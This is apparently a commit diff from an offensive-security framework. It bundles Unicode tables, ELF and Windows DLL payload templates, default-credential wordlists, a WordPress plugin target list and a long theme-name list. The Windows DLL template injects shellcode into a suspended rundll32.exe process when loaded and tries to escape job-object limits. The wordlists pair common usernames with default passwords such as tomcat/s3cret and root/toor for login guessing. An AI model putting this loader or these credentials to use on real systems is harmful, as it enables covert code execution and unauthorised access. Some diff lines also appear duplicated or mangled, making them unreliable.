c = 0x1fb00; // from BLOCK SEXTANT-1
while (c <= 0x1fb92) // ..to UPPER HALF INVERSE MEDIUM SHADE AND LOWER HALF BLOCK
charset[i++] = c++;
c = 0x1fb94; // from LEFT HALF INVERSE MEDIUM SHADE AND RIGHT HALF BLOCK
while (c <= 0x1fbca) // ..to WHITE UP-POINTING CHEVRON
charset[i++] = c++;
c = 0x1fbf0; // from SEGMENTED DIGIT ZERO
while (c <= 0x1fbf9) // ..to SEGMENTED DIGIT NINE
charset[i++] = c++;
// 20000..2A6DF; CJK Unified Ideographs Extension B
c = 0x20000; // from <CJK Ideograph Extension B, First>
while (c <= 0x2a6d6) // ..to <CJK Ideograph Extension B, Last>
while (c <= 0x2a6dd) // ..to <CJK Ideograph Extension B, Last>
charset[i++] = c++;
// 2A700..2B73F; CJK Unified Ideographs Extension C
c = 0x2a700; // from <CJK Ideograph Extension C, First>
@@ -2298,6 +2400,10 @@ void init()
c = 0x2f800; // from CJK COMPATIBILITY IDEOGRAPH-2F800
while (c <= 0x2fa1d) // ..to CJK COMPATIBILITY IDEOGRAPH-2FA1D
charset[i++] = c++;
// 30000..3134F; CJK Unified Ideographs Extension G
c = 0x30000; // from <CJK Ideograph Extension G, First>
while (c <= 0x3134a) // ..to <CJK Ideograph Extension G, Last>
charset[i++] = c++;
// E0000..E007F; Tags
c = 0xe0020; // from TAG SPACE
while (c <= 0xe007f) // ..to CANCEL TAG
+15
View File
@@ -0,0 +1,15 @@
______________________________________
/ it looks like you're trying to run a \
\ module /
--------------------------------------
\
\
__
/ \
| |
@ @
| |
|| |/
|| ||
|\_/|
\___/
Binary file not shown.
+1 -8
View File
@@ -642,23 +642,16 @@
<edge source="block.0x1000" target="block.0x1017"/>
<edge source="block.0x1017" target="block.0x1023"/>
<edge source="block.0x1023" target="block.0x102b"/>
<edge source="block.0x1023" target="block.0x102d"/>
<edge source="block.0x102b" target="block.0x102d"/>
<edge source="block.0x102d" target="block.0x1036"/>
<edge source="block.0x102d" target="block.0x1023"/>
<edge source="block.0x1036" target="block.0x104b"/>
<edge source="block.0x1036" target="block.0x10bd"/>
<edge source="block.0x104b" target="block.0x1056"/>
<edge source="block.0x104b" target="block.0x10bd"/>
<edge source="block.0x1056" target="block.0x1064"/>
<edge source="block.0x1064" target="block.0x1066"/>
<edge source="block.0x1064" target="block.0x10bc"/>
<edge source="block.0x1066" target="block.0x1073"/>
<edge source="block.0x1073" target="block.0x1073"/>
<edge source="block.0x1073" target="block.0x1082"/>
<edge source="block.0x1082" target="block.0x1064"/>
<edge source="block.0x1082" target="block.0x108c"/>
<edge source="block.0x108c" target="block.0x10bc"/>
<edge source="block.0x10bc" target="block.0x10bd"/>
<edge source="block.0x10bd" target="block.0x1017"/>
</graph>
</graphml>
+1 -7
View File
@@ -595,21 +595,15 @@
<edge source="block.0x1000" target="block.0x100f"/>
<edge source="block.0x100f" target="block.0x1018"/>
<edge source="block.0x1018" target="block.0x101f"/>
<edge source="block.0x1018" target="block.0x1021"/>
<edge source="block.0x101f" target="block.0x1021"/>
<edge source="block.0x1021" target="block.0x1018"/>
<edge source="block.0x1021" target="block.0x1029"/>
<edge source="block.0x1029" target="block.0x103a"/>
<edge source="block.0x1029" target="block.0x1086"/>
<edge source="block.0x103a" target="block.0x1045"/>
<edge source="block.0x1045" target="block.0x1049"/>
<edge source="block.0x1045" target="block.0x1085"/>
<edge source="block.0x1049" target="block.0x1051"/>
<edge source="block.0x1051" target="block.0x1051"/>
<edge source="block.0x1051" target="block.0x105d"/>
<edge source="block.0x105d" target="block.0x1045"/>
<edge source="block.0x105d" target="block.0x1065"/>
<edge source="block.0x1065" target="block.0x1085"/>
<edge source="block.0x1085" target="block.0x1086"/>
<edge source="block.0x1086" target="block.0x100f"/>
</graph>
</graphml>
@@ -0,0 +1,93 @@
; build with:
; nasm elf_dll_aarch64_template.s -f bin -o template_aarch64_linux_dll.bin
BITS 64
org 0
ehdr: ; Elf64_Ehdr
db 0x7F, "ELF", 2, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw 3 ; e_type = ET_DYN
dw 0xB7 ; e_machine = AARCH64
dd 1 ; e_version
dq _start ; e_entry
dq phdr - $$ ; e_phoff
dq shdr - $$ ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 2 ; e_phnum
dw shentsize ; e_shentsize
dw 2 ; e_shnum
dw 1 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type = PT_LOAD
dd 7 ; p_flags = rwx
dq 0 ; p_offset
dq $$ ; p_vaddr
dq $$ ; p_paddr
dq 0xDEADBEEF ; p_filesz
dq 0xDEADBEEF ; p_memsz
dq 0x1000 ; p_align
phdrsize equ $ - phdr
dd 2 ; p_type = PT_DYNAMIC
dd 7 ; p_flags = rwx
dq dynsection ; p_offset
dq dynsection ; p_vaddr
dq dynsection ; p_vaddr
dq dynsz ; p_filesz
dq dynsz ; p_memsz
dq 0x1000 ; p_align
shdr:
dd 1 ; sh_name
dd 6 ; sh_type = SHT_DYNAMIC
dq 0 ; sh_flags
dq dynsection ; sh_addr
dq dynsection ; sh_offset
dq dynsz ; sh_size
dd 0 ; sh_link
dd 0 ; sh_info
dq 8 ; sh_addralign
dq 7 ; sh_entsize
shentsize equ $ - shdr
dd 0 ; sh_name
dd 3 ; sh_type = SHT_STRTAB
dq 0 ; sh_flags
dq strtab ; sh_addr
dq strtab ; sh_offset
dq strtabsz ; sh_size
dd 0 ; sh_link
dd 0 ; sh_info
dq 0 ; sh_addralign
dq 0 ; sh_entsize
dynsection:
; DT_INIT
dq 0x0c
dq _start
; DT_STRTAB
dq 0x05
dq strtab
; DT_SYMTAB
dq 0x06
dq strtab
; DT_STRSZ
dq 0x0a
dq 0
; DT_SYMENT
dq 0x0b
dq 0
; DT_NULL
dq 0x00
dq 0
dynsz equ $ - dynsection
strtab:
db 0
db 0
strtabsz equ $ - strtab
global _start
_start:
@@ -3,7 +3,7 @@
BITS 64
org 0
org 0x400000
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 2, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
+144 -137
View File
@@ -1,137 +1,144 @@
#include <windows.h>
#include "template.h"
#if BUILDMODE == 2
/* hand-rolled bzero allows us to avoid including ms vc runtime */
void inline_bzero(void *p, size_t l)
{
BYTE *q = (BYTE *)p;
size_t x = 0;
for (x = 0; x < l; x++)
*(q++) = 0x00;
}
#endif
void ExecutePayload(void);
BOOL WINAPI
DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
ExecutePayload();
break;
case DLL_PROCESS_DETACH:
// Code to run when the DLL is freed
break;
case DLL_THREAD_ATTACH:
// Code to run when a thread is created during the DLL's lifetime
break;
case DLL_THREAD_DETACH:
// Code to run when a thread ends normally.
break;
}
return TRUE;
}
// Use a combination semaphore / event to check if the payload is already running and when it is, don't start a new
// instance. This is to fix situations where the DLL is loaded multiple times into a host process and prevents the
// payload from being executed multiple times. An event object is used to determine if the payload is currently running
// in a child process. The event handle is created by this process (the parent) and configured to be inherited by the
// child. While the child process is running, the event handle can be successfully opened. When the child process exits,
// the event handle that was inherited from the parent will be automatically closed and subsequent calls to open it will
// fail. This indicates that the payload is no longer running and a new instance can be created.
BOOL Synchronize(void) {
BOOL bResult = TRUE;
BOOL bRelease = FALSE;
HANDLE hSemaphore = NULL;
HANDLE hEvent = NULL;
SECURITY_ATTRIBUTES SecurityAttributes;
// step 1: define security attributes that permit handle inheritance
SecurityAttributes.nLength = sizeof(SECURITY_ATTRIBUTES);
SecurityAttributes.lpSecurityDescriptor = NULL;
SecurityAttributes.bInheritHandle = TRUE;
do {
// step 2: create a semaphore to synchronize this routine
if ((hSemaphore = CreateSemaphoreA(&SecurityAttributes, 1, 1, szSyncNameS)) == NULL) {
// if the semaphore creation fails, break out using the default TRUE result, this shouldn't happen
break;
}
bResult = FALSE;
// step 3: acquire the semaphore, if the operation timesout another instance is already running so exit
if (WaitForSingleObject(hSemaphore, 0) == WAIT_TIMEOUT) {
break;
}
bRelease = TRUE;
// step 4: check if the event already exists
if (hEvent = OpenEventA(READ_CONTROL | SYNCHRONIZE, TRUE, szSyncNameE)) {
// if the event already exists, do not continue
CloseHandle(hEvent);
break;
}
// step 5: if the event does not already exist, create a new one that will be inherited by the child process
if (hEvent = CreateEventA(&SecurityAttributes, TRUE, TRUE, szSyncNameE)) {
bResult = TRUE;
}
} while (FALSE);
// step 6: release and close the semaphore as necessary
if (hSemaphore) {
if (bRelease) {
ReleaseSemaphore(hSemaphore, 1, NULL);
}
CloseHandle(hSemaphore);
}
// *do not* close the event handle (hEvent), it needs to be inherited by the child process
return bResult;
}
void ExecutePayload(void) {
int error;
PROCESS_INFORMATION pi;
STARTUPINFO si;
CONTEXT ctx;
DWORD prot;
LPVOID ep;
// Start up the payload in a new process
inline_bzero( &si, sizeof( si ));
si.cb = sizeof(si);
if (Synchronize()) {
// Create a suspended process, write shellcode into stack, make stack RWX, resume it
if (CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) {
ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
GetThreadContext(pi.hThread, &ctx);
ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
#ifdef _WIN64
ctx.Rip = (DWORD64)ep;
#else
ctx.Eip = (DWORD)ep;
#endif
SetThreadContext(pi.hThread,&ctx);
ResumeThread(pi.hThread);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
}
ExitThread(0);
}
#include <windows.h>
#include "template.h"
#if BUILDMODE == 2
/* hand-rolled bzero allows us to avoid including ms vc runtime */
void inline_bzero(void *p, size_t l)
{
BYTE *q = (BYTE *)p;
size_t x = 0;
for (x = 0; x < l; x++)
*(q++) = 0x00;
}
#endif
void ExecutePayload(void);
BOOL WINAPI
DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved)
{
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
ExecutePayload();
break;
case DLL_PROCESS_DETACH:
// Code to run when the DLL is freed
break;
case DLL_THREAD_ATTACH:
// Code to run when a thread is created during the DLL's lifetime
break;
case DLL_THREAD_DETACH:
// Code to run when a thread ends normally.
break;
}
return TRUE;
}
// Use a combination semaphore / event to check if the payload is already running and when it is, don't start a new
// instance. This is to fix situations where the DLL is loaded multiple times into a host process and prevents the
// payload from being executed multiple times. An event object is used to determine if the payload is currently running
// in a child process. The event handle is created by this process (the parent) and configured to be inherited by the
// child. While the child process is running, the event handle can be successfully opened. When the child process exits,
// the event handle that was inherited from the parent will be automatically closed and subsequent calls to open it will
// fail. This indicates that the payload is no longer running and a new instance can be created.
BOOL Synchronize(void) {
BOOL bResult = TRUE;
BOOL bRelease = FALSE;
HANDLE hSemaphore = NULL;
HANDLE hEvent = NULL;
SECURITY_ATTRIBUTES SecurityAttributes;
// step 1: define security attributes that permit handle inheritance
SecurityAttributes.nLength = sizeof(SECURITY_ATTRIBUTES);
SecurityAttributes.lpSecurityDescriptor = NULL;
SecurityAttributes.bInheritHandle = TRUE;
do {
// step 2: create a semaphore to synchronize this routine
if ((hSemaphore = CreateSemaphoreA(&SecurityAttributes, 1, 1, szSyncNameS)) == NULL) {
// if the semaphore creation fails, break out using the default TRUE result, this shouldn't happen
break;
}
bResult = FALSE;
// step 3: acquire the semaphore, if the operation timesout another instance is already running so exit
if (WaitForSingleObject(hSemaphore, 0) == WAIT_TIMEOUT) {
break;
}
bRelease = TRUE;
// step 4: check if the event already exists
if (hEvent = OpenEventA(READ_CONTROL | SYNCHRONIZE, TRUE, szSyncNameE)) {
// if the event already exists, do not continue
CloseHandle(hEvent);
break;
}
// step 5: if the event does not already exist, create a new one that will be inherited by the child process
if (hEvent = CreateEventA(&SecurityAttributes, TRUE, TRUE, szSyncNameE)) {
bResult = TRUE;
}
} while (FALSE);
// step 6: release and close the semaphore as necessary
if (hSemaphore) {
if (bRelease) {
ReleaseSemaphore(hSemaphore, 1, NULL);
}
CloseHandle(hSemaphore);
}
// *do not* close the event handle (hEvent), it needs to be inherited by the child process
return bResult;
}
void ExecutePayload(void) {
int error;
PROCESS_INFORMATION pi;
STARTUPINFO si;
CONTEXT ctx;
DWORD prot;
LPVOID ep;
// Start up the payload in a new process
inline_bzero( &si, sizeof( si ));
si.cb = sizeof(si);
if (Synchronize()) {
// Create a suspended process, write shellcode into stack, make stack RWX, resume it
DWORD result = CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS|CREATE_BREAKAWAY_FROM_JOB, NULL, NULL, &si, &pi);
// If we fail, try again without the CREATE_BREAKAWAY_FROM_JOB flag in the event that we are in a job but we can't break away from it.
if (result == FALSE){
result = CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi);
}
if (result) {
ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
GetThreadContext(pi.hThread, &ctx);
ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
#ifdef _WIN64
ctx.Rip = (DWORD64)ep;
#else
ctx.Eip = (DWORD)ep;
#endif
SetThreadContext(pi.hThread,&ctx);
ResumeThread(pi.hThread);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
}
ExitThread(0);
}
+1 -1
View File
@@ -4,7 +4,7 @@
/* hand-rolled bzero allows us to avoid including ms vc runtime */
void inline_bzero(void *p, size_t l)
{
BYTE *q = (BYTE *)p;
size_t x = 0;
for (x = 0; x < l; x++)
Binary file not shown.
Binary file not shown.
BIN
View File
Binary file not shown.
BIN
View File
Binary file not shown.
+40
View File
@@ -0,0 +1,40 @@
alertlist
annolist
barchart
bargauge
candlestick
cloudwatch
dashlist
elasticsearch
gauge
geomap
gettingstarted
grafana-azure-monitor-datasource
graph
heatmap
histogram
influxdb
jaeger
logs
loki
mssql
mysql
news
nodeGraph
opentsdb
piechart
pluginlist
postgres
prometheus
stackdriver
stat
state-timeline
status-history
table
table-old
tempo
testdata
text
timeseries
welcome
zipkin
@@ -5,3 +5,16 @@ root
tomcat
s3cret
vagrant
QLogic66
password
Password1
changethis
r00t
toor
password1
j2deployer
OvW*busr1
kdsxc
owaspba
ADMIN
xampp
@@ -7,3 +7,27 @@ xampp xampp
tomcat s3cret
QCC QLogic66
admin vagrant
admin password
admin
admin Password1
admin password1
admin admin
admin tomcat
both tomcat
manager manager
role1 role1
role1 tomcat
role changethis
root Password1
root changethis
root password
root password1
root r00t
root root
root toor
tomcat tomcat
tomcat password1
tomcat password
tomcat
tomcat admin
tomcat changethis
@@ -1,6 +1,13 @@
admin
manager
role1
role
root
tomcat
both
QCC
j2deployer
ovwebusr
cxsdk
ADMIN
xampp
+56
View File
@@ -0,0 +1,56 @@
wordpress-popular-posts
backup
catch-themes-demo-import
modern-events-calendar-lite
ninja-forms
simple-file-list
sp-client-document-manager
drag-and-drop-multiple-file-upload-contact-form-7
wp-file-manager
duplicator
work-the-flow-file-upload
ajax-load-more
wpdiscuz
wptouch
front-end-editor
wpshop
plainview-activity-monitor
sexy-contact-form
download-manager
inboundio-marketing
wp-mobile-detector
website-contact-form-with-file-upload
slideshow-gallery
reflex-gallery
wp-symposium
photo-gallery
pie-register
wysija-newsletters
dzs-zoomsounds
all-in-one-wp-migration
wp-ultimate-csv-importer
wp-symposium
masterstudy-lms-learning-management-system
wp-gdpr-compliance
wp-automatic
wp-easycart
dukapress
loginizer
email-subscribers
wps-hide-login
secure-copy-content-protection
wordpress-mobile-pack
learnpress
wp-mobile-edition
boldgrid-backup
modern-events-calendar-lite
gi-media-library
chopslider
bulletproof-security
nextgen-gallery
simple-backup
subscribe-to-comments
easy-wp-smtp
duplicator_download
custom-registration-form-builder-with-submission-manager
woocommerce-abandoned-cart
+2
View File
@@ -0,0 +1,2 @@
holding_pattern
wplms
File diff suppressed because it is too large Load Diff
+970
View File
@@ -159,12 +159,15 @@ aadi
aadya
aagaz-startup
aak
aak-plus
aakanksha-unique
aakriti-personal-blog
aakrosh
aamla
aanews
aanglo
aapna
aarambha-blogger
aargee
aari
aaron
@@ -180,6 +183,7 @@ abalane
abaris
abaya
abazzy
abblog
abc-author-dipendahal
abcbb
abcblog
@@ -187,6 +191,7 @@ abcmn
abcok
abdum
abedul
abel
abel-one
abel_rad_theme
aberdeen
@@ -209,6 +214,7 @@ abov
above-skyline-demo
above-skyline-lite
abrevo
abril
absolum
absolute
absolute-minimum
@@ -224,12 +230,14 @@ abstract-grid
abstract-wordpress-blog-theme
abstractlightyellow
abstractum-pro-concreto
abteam
abtely
abubize-business
abuhill
abulogics
abythens
ac-board
ac-care
ac-repair
academic
academic-clear
@@ -356,6 +364,7 @@ adapter
adaption
adaptive
adaptive-flat
adarsa
adbooster
add-your-content-wordpress-theme
adela
@@ -364,6 +373,7 @@ adelle
adelle-amv-pink
aden
adena
adens-news
adept
adeq
adformat
@@ -434,6 +444,8 @@ adventurous
advertica-lite
advik-blog-lite
adviso
advisory
advocate-lite
advocator-lite
aeb-photo-gallery
aeb-photography-theme
@@ -466,6 +478,7 @@ afeeee
affidavit
affiliate-blog-writer
affiliate-booster
affiliate-booster-sk
affiliate-marketingly
affiliate-newspaperly
affiliateblogwriter
@@ -500,9 +513,11 @@ agency-lite
agency-maker
agency-plus
agency-starter
agency-techup
agency-x
agency-zita
agencyup
agencyup-dark
agensy
aggiornare
agile-spirit
@@ -512,10 +527,13 @@ agindo
agiva
aglee-lite
agncy
agni
agri-lite
agroamerica
agronomics-lite
aguafuerte
agus-defrian
agus-twenty-ones
ah-business
ahab
ahimsa
@@ -557,6 +575,7 @@ akangatu
akarsh-blog
akash
akasse
akbar
akella
akhada-fitness-gym
aki-blog
@@ -596,6 +615,7 @@ alante-shop
alante-x
alante2
alantrarose
alara
alaska-free
alaymack
alba
@@ -757,6 +777,7 @@ alternate-lite
alternative
altertech_s
althea
althea-wp
altis
altis-fx
altis-simple
@@ -766,6 +787,7 @@ altitudelite
altminimo
altofocus
alum
alurra
alux
alvaro-uri-httpsthemepalace-comdownloadstravel-ultimate
alvn-pizza
@@ -790,6 +812,7 @@ amaranthine
amaryllo
amateur
amathambo
amaz-store
amazeblog
amazica
amazica-business
@@ -811,6 +834,7 @@ ambling-bellows
ambrosia
amdhas
ameen
amela
ameno
american-bones-for-wordpress
americana
@@ -821,6 +845,7 @@ ameya
amez
ami-tuxedo
amiable
amicomfortable
amidst-sky
amiga-blanca
amigo
@@ -857,6 +882,7 @@ amplify
amplifyworldwide
amplight
amplitude
amprogramacion
ampwp
amstel
amv-pink
@@ -887,12 +913,14 @@ anatta
anchor
anchorage
andar
andbusiness
andclean
anderson
anderson-lite
andia
andorra
andoru
andre-lite
andrea
andretheme01
andrewsc
@@ -902,8 +930,10 @@ android-wordpress-theme
andybegin_test
andyblue
andygray
anecdote-lite
aneeq
anew
anexa
anfaust
anfolder
angel_f-tipografico
@@ -929,6 +959,7 @@ anime
anime-crowds
anime-days
anime-desu
anime-games
anime-heaven
anime-template-theme
animepress
@@ -959,6 +990,7 @@ anp_creative
anp_instagpress
ans
ansia
ansupa
ant-green
ant-magazine
anther
@@ -978,6 +1010,8 @@ anvil-theme
anvys
anya
anymags
anymags-news
anyna
anyonepage
anypixelpixel中文版
anz-mohamed
@@ -990,6 +1024,7 @@ apazit
apbt
apelle-uno
apelsin
aperitto
aperture
aperture-2
aperture-portfolio
@@ -1030,6 +1065,7 @@ appliance
application
applicator
appmela
appointable
appointee
appointment
appointment-blue
@@ -1049,6 +1085,7 @@ apptheme-free
appworx
appzend
appzend-business
appzend-commerce
apricot
apricot-blog
apt-news
@@ -1081,10 +1118,12 @@ aranovo
aranovo2
arash
arav
aravalli
aravan
arb-blogging
arba
arbitragex
arbuda
arbune
arbutus
arcade-basic
@@ -1097,9 +1136,13 @@ arche
archie
archimedes
architect
architect-architecture
architect-decor
architect-design
architect-designs
architect-lite
architectonic
architects
architecture
architectwp
archy
@@ -1131,18 +1174,25 @@ aribiz
ariblog
ariboom
aribull
aribull-blog
aricop
aricup
aridream
aridream2
aridum
ariel
ariele-lite
aries
ariftheme
ariland
ariletech
arilewp
arima
arimolite
arina
ariniom
aripop
ariqube
arise
ariwoo
arix
@@ -1150,6 +1200,7 @@ arixoo
arjuna
arjuna-x
arkade-sec
arkbiz
arke
arkhe
arkt
@@ -1275,6 +1326,7 @@ asket-magazine
asmartgs
asokay
asonant
aspace
aspen
aspiration-i
aspire
@@ -1293,7 +1345,9 @@ asteria-lite
asteria-lite2
asterion
asteroid
astha
asthir
asthir-blog
asthir-plus
asthir-shop
astn
@@ -1302,15 +1356,20 @@ astore
astori
astra
astra-brixco-frd
astrad
astral
astran
astrasimo
astrid
astrid-child
astrid-ianbalding
astrid_tova
astridd
astrio
astro
astrologer
astrology
astromag
astronomy
astroride
asura
@@ -1363,8 +1422,10 @@ attimo
attirant
attire
attire-blog
attire-shop
attitude
attorney
attractiv
attractwhite
attractwhite-theme
atwitteration
@@ -1383,11 +1444,13 @@ auctions
auctor
audacity-of-tanish
audictive-ten
audio-podcast
audioman
audiotheme-fourteen
auenwald
august-writing
augusta
auliettalite
aura
aura71
aurelia
@@ -1415,10 +1478,12 @@ authority-market
authority-marketer
authority-theme-lite
authorize
authorpreneur
authors-notepad
autmunport
autmunport-1-1
auto-car
auto-car-care
auto-d
auto-dealer
auto-dezmembrari
@@ -1456,6 +1521,10 @@ autumnnow
avad
avada
avadanta
avadanta-agency
avadanta-business
avadanta-consulting
avadanta-corporate
avadar
avail
avak-fitness
@@ -1469,7 +1538,9 @@ avant
avant-portfolio
avant-x
avante
avante-lite
avanti
avanza-lite
avata
avatar
ave-lite
@@ -1487,6 +1558,7 @@ avid-fashion
avid-fitness
avid-magazine
avid-travel
avidnews
avien-light
avik
avior
@@ -1520,12 +1592,15 @@ awaken2
awakening
awakening-1-2
awanlangit
awe-blog
awe-door
awesome
awesome-beauty
awesome-blog
awesome-blog-lite
awesome-business
awesome-one-page
awesome-portfolio
awesome-portfolio-free-version
awesome-portfolio-lite
awesome-portfolio-premium-version
@@ -1545,6 +1620,8 @@ axio-lite
axiohost
axiom
axis-magazine
axtia
axtria
aya
ayaairport
ayabiostorelite
@@ -1631,6 +1708,7 @@ babycare
babylog
babyme
babysitter-lite
babysitting-day-care
back-my-book
back-to-basic
back-to-school
@@ -1648,6 +1726,7 @@ badjohnny
baena
bagility
bahama
bai
bajaar
bakedwp
bakerblues
@@ -1677,6 +1756,7 @@ bands
bandtheme
bangasd
bangkok1
bangla-bazar
bangladesh
banheiros-quimicos
bani
@@ -1690,6 +1770,7 @@ bar-restaurant
barbara
barbaros-tinos
barber
barber-lite
barcelona
barclays
barcode-uri-httpswoocommerce-comstorefront
@@ -1703,6 +1784,7 @@ bariskkk
barista
barkly
barletta
barlow
barom
barter
barthelme
@@ -1721,6 +1803,7 @@ baseline
basepress
baseshine
basetheme
bashir-rased
basho
basic
basic-bikes-limited
@@ -1759,6 +1842,7 @@ batpa
batterylaptops
baughxie
bauingh
baumkupen
bausetin
baustein
baustein-learner-theme
@@ -1843,6 +1927,7 @@ beauty-mountain
beauty-parlour
beauty-saloon
beauty-spa
beauty-spa-salon
beauty-studio
beauty-studio-pro
beauty-theme
@@ -1869,6 +1954,7 @@ beetle
beevent
beezness
beflex
befold
befreiphone
beginner
beginnings
@@ -1900,6 +1986,7 @@ belleza
bellini
bellinus
bellored
belltech
belly
bellyrn
beluga
@@ -1938,6 +2025,7 @@ bersallis
beryl
beshop
beshop-free
beshop-plus
best
best-blog
best-business
@@ -1953,6 +2041,7 @@ best-food
best-hotel
best-learner
best-magazine
best-minimal-restaurant
best-minimalist
best-movie-theme
best-news
@@ -2010,6 +2099,7 @@ bibliotecas
bicbb
bicubic
bicycle
bicycle-rental
bicycleshop
biddo
bidhantech
@@ -2027,6 +2117,7 @@ big-little-something
big-pink
big-pix
big-red-framework
big-scene
big-stone
big-store
bigblank
@@ -2038,6 +2129,7 @@ bigrecipe
bigred
bigseo-theme-lite
bigstore
bigvisual
bigwigs
bijinepalli
bikaner
@@ -2045,6 +2137,7 @@ bikaro
bikashsoft-charity
bikashsoft-charity-theme
bike-city
bike-shop
biker
bikes
bilbo
@@ -2119,6 +2212,7 @@ bizbell
bizberg
bizberg-agency
bizberg-consulting-dark
bizberg-individual-consultant
bizberg-shop
bizbir
bizblack
@@ -2130,8 +2224,10 @@ bizcent
bizconsulting
bizcorp
bizdir
bizfit
bizflare
bizflow
bizfocus
bizfolio
bizgrowth
bizgrowth2
@@ -2149,6 +2245,7 @@ biznesspack
biznez-lite
biznis
bizniz
biznol
bizonex
bizplan
bizplus
@@ -2164,6 +2261,7 @@ bizstartup
bizstudio-lite
bizstudio-lite-demo
biztheme
bizthems
biztime
bizto
biztrix
@@ -2224,6 +2322,7 @@ black-letterhead
black-lighting
black-line
black-lucas
black-magazine
black-mix
black-music
black-n-blue
@@ -2300,6 +2399,7 @@ blackzebra
blagz-blog-magazine-theme
blain
blaize
blakely
blanc
blanche-lite
blank
@@ -2347,6 +2447,7 @@ blocal
block
block-based-bosco
block-lite
blockbase
blockchain-lite
blocked
blockfield
@@ -2376,6 +2477,7 @@ blog-circle
blog-creative
blog-curvo
blog-cycle
blog-decode
blog-design-lite
blog-design-studio-newblue
blog-diary
@@ -2406,6 +2508,7 @@ blog-lite
blog-lover
blog-mag
blog-magazine
blog-mall
blog-mantra
blog-mash
blog-master
@@ -2415,6 +2518,7 @@ blog-minimalistas
blog-monstor
blog-nano
blog-new
blog-on
blog-one
blog-one-by-michael-f
blog-one-bywebsitedeluxcom
@@ -2429,8 +2533,10 @@ blog-star
blog-start
blog-starter
blog-station
blog-tales
blog-theme
blog-times
blog-town
blog-vlog
blog-warrior-theme
blog-way
@@ -2441,10 +2547,12 @@ blog-zone
blog-zone-update
blog0sphere
blog2019
blog22
blog64
blog99
blog_and_blog-sultan
bloga
blogable
blogaholic-blue
blogaki
blogan
@@ -2456,6 +2564,7 @@ blogatize-blue-10-wordpress-theme
blogazine
blogazine_wct
blogband
blogbaster
blogbee
blogbell
blogberg
@@ -2466,6 +2575,7 @@ blogbox
blogbuzz
blogcafe
blogcentral
blogdaily
blogdot
bloge
blogeasy
@@ -2474,6 +2584,7 @@ bloger
blogera
blogery
blogever
blogexpress
blogfeedly
blogfolio
blogg
@@ -2523,6 +2634,7 @@ bloggy-v-2-child-theme
bloghut
blogi
blogiee
blogification
blogified
blogify
blogim
@@ -2542,6 +2654,7 @@ blogjr-portfolio
blogkori
bloglane
blogline
blogling
bloglite
blogly-lite
blogmagazine
@@ -2594,6 +2707,7 @@ blogstart-pro-amp
blogster
blogster-utility
blogstrap
blogstream
blogstyle
blogtay
blogtime
@@ -2637,8 +2751,10 @@ blossom-chic
blossom-coach
blossom-consulting
blossom-diva
blossom-ecommerce
blossom-fashion
blossom-feminine
blossom-floral
blossom-health-coach
blossom-mommy-blog
blossom-pin
@@ -2660,6 +2776,7 @@ blox32
bloxy
bloxy-two
bloxz
bloz
blu-mag
blue
blue-and-grey
@@ -2755,6 +2872,7 @@ blue-steel
blue-swirl
blue-swirl-advanced
blue-taste
blue-tech-blog
blue-template
blue-theme
blue-uri-httpcyberchimps-comeclipse
@@ -2939,6 +3057,7 @@ boonik
boost-biz
boost_me
booster
boostify
boot-store
boot_strap
bootbiz-for-wedding
@@ -2955,6 +3074,7 @@ bootroot
boots
bootsbas
bootscore
bootspress
bootstar
bootstrap
bootstrap-386
@@ -2966,8 +3086,10 @@ bootstrap-beauty
bootstrap-blank
bootstrap-blog
bootstrap-canvas-wp
bootstrap-coach
bootstrap-component-blox
bootstrap-essentials
bootstrap-fitness
bootstrap-four
bootstrap-journal
bootstrap-lightpress
@@ -2982,6 +3104,7 @@ bootstrap-starter-template
bootstrap-theme-by-zm-tech
bootstrap-ultimate
bootstrap-wordpress-theme
bootstrap-wp-starter
bootstrap-x
bootstrapfast
bootstraptheme
@@ -3001,10 +3124,22 @@ bornoux-theme
boron
borrowed-cr
bosa
bosa-blog
bosa-blog-dark
bosa-business
bosa-charity
bosa-consulting
bosa-corporate-business
bosa-corporate-dark
bosa-finance
bosa-fitness
bosa-insurance
bosa-lawyer
bosa-marketing
bosa-news-blog
bosa-store
bosa-travelers-blog
bosa-wedding
bosco
bose
boshki-portfolio
@@ -3017,11 +3152,14 @@ boston-business
bota
botanical
bothainah
botiga
botticelli
boundlessnews
bouquet
bourboneat
boutique
boutique2-222
bovity
box
box-of-boom
boxblog
@@ -3029,6 +3167,7 @@ boxcard
boxed-wp
boxed-zebra
boxed-zebra-theme
boxsite
boxstyle
boxwp
boxy
@@ -3047,6 +3186,7 @@ brad
bradbury
brain-power
brainbean
brainpress
brajeshwar
branches
brand
@@ -3122,6 +3262,7 @@ bring-back
brisk
brisko
brisko-blog
brite
britt
brittaboard
brittany-light
@@ -3184,6 +3325,7 @@ bubbles-squared
bubblewrap
bubbly
bubu
buconz-starter
buddha-theme
buddhism
buddyeleven
@@ -3220,6 +3362,7 @@ builder-lite
builderio
builders
builders-landing-page
builders-lite
building
building-blocks
